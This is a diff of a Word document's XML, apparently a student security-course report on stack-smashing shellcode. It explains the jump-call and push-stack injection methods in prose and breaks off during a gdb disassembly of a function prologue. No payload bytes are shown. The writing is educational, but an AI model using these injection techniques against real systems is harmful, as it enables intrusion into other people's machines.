--- a/CS465-Security/Projects/Project9_StackSmasingSHELL_Code.docx
+++ b/CS465-Security/Projects/Project9_StackSmasingSHELL_Code.docx
@@ -86,7 +86,15 @@
           <w:kern w:val="36"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">    Christopher </w:t>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:eastAsia="Times New Roman" w:hAnsi="Times" w:cs="Times New Roman"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="36"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Christopher </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -231,16 +239,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times" w:eastAsia="Times New Roman" w:hAnsi="Times" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="000000"/>
-          <w:kern w:val="36"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:eastAsia="Times New Roman" w:hAnsi="Times" w:cs="Times New Roman"/>
-          <w:b/>
           <w:color w:val="000000"/>
           <w:kern w:val="36"/>
         </w:rPr>
@@ -276,6 +274,14 @@
           <w:color w:val="000000"/>
           <w:kern w:val="36"/>
         </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:eastAsia="Times New Roman" w:hAnsi="Times" w:cs="Times New Roman"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="36"/>
+        </w:rPr>
         <w:t>CS 465</w:t>
       </w:r>
     </w:p>
@@ -290,15 +296,3505 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">There are four major </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>things</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> that I learned while disassembling </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>shell code</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>basic assembly instruction</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a greater understanding of </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>gcc’s</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> NULL macro, the call-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">jump shell, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">and the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>push stack</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> shell</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">.  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>The first great frustration</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> came when the example code I</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> was trying to mimic forgot an</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>all-important</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> #include.  This include contained the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>gcc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> macro for NULL.  My original </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>understanding</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> for NULL was </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>simply</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> that it was a zero</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> byte</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, however, this is not completely true.  NULL in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>gcc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>actually</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a (void*</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>)0</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">.  It is a pointer to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>nothing</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>; t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">his actually is a major distinction.  Once I figured this out I was able to generate the assembly code from </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>gcc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> found below.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>From there</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> I observed some basic assembly instructions.  Whenever a function call is made there are a few basic </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>instructions</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> that are generated to make room for local variables and save the base pointer.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  I also observed that when a function call is made a compiler/OS can either push </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>parameters</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> onto the stack or it can move them into registers.  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>The parameters are pushed on in reverse order.  From there the function call is made.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  I also learned that some systems </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>have single instructions to enter kernel mode, where others call routines.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>Along with these few basic assembly ideas</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> I also learned about two </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">types of shell injection methods.  One method is the jump and call method, where the other is the push stack method.  The jump and call method uses the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>jmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> instructions ability to jump to an </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>arbitrary</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> number of bytes in order to land on a call instruction directly above the sh</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ell code.  When the call method is executed it pushes the address of the shell code onto the stack.  The call method is made to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>jmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to some </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>eve</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>cve</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> setup code.  Given that the call method just pushed the address of the shell code onto the stack, the exploit code has now oriented itself.  It then pushes the appropriate address</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>es</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> onto stack and </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">performs the shell </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>execution.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The push stack method, however, performs this attack </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">in a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>slightly</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> more elegant way.  Instead of copying the shell code onto the stack and then jumping to its location, the push stack method simply pushes the needed shell command directly </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>onto</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">stack, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">where </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>they’re</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> needed.  This avoids the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>hassle</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> of trying to orient the exploit </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>code;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> it just uses the stack pointer instead.  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>With the code pushed on t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">he stack it performs the shell </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>execution.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">While implementing these two methods </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">I ran into some OS </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>compatibility</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> errors with the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>jmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>-call approach but was able to successfully implement the stack push approach.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
+        </w:pBdr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>Main Definition:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>Dump of assembler code for function main:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   0x08048e84 &lt;+0&gt;:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>push   %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>ebp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   0x08048e85 &lt;+1&gt;:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>mov</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>esp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>,%</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>ebp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   0x08048e87 &lt;+3&gt;:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>and    $0xfffffff0</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>,%</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>esp</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   0x08048e8a &lt;+6&gt;:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>sub    $0x20</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>,%</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>esp</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>---Prelude</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   0x08048e8d &lt;+9&gt;:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>movl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   $0x80c8228,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>0x18(%</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>esp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
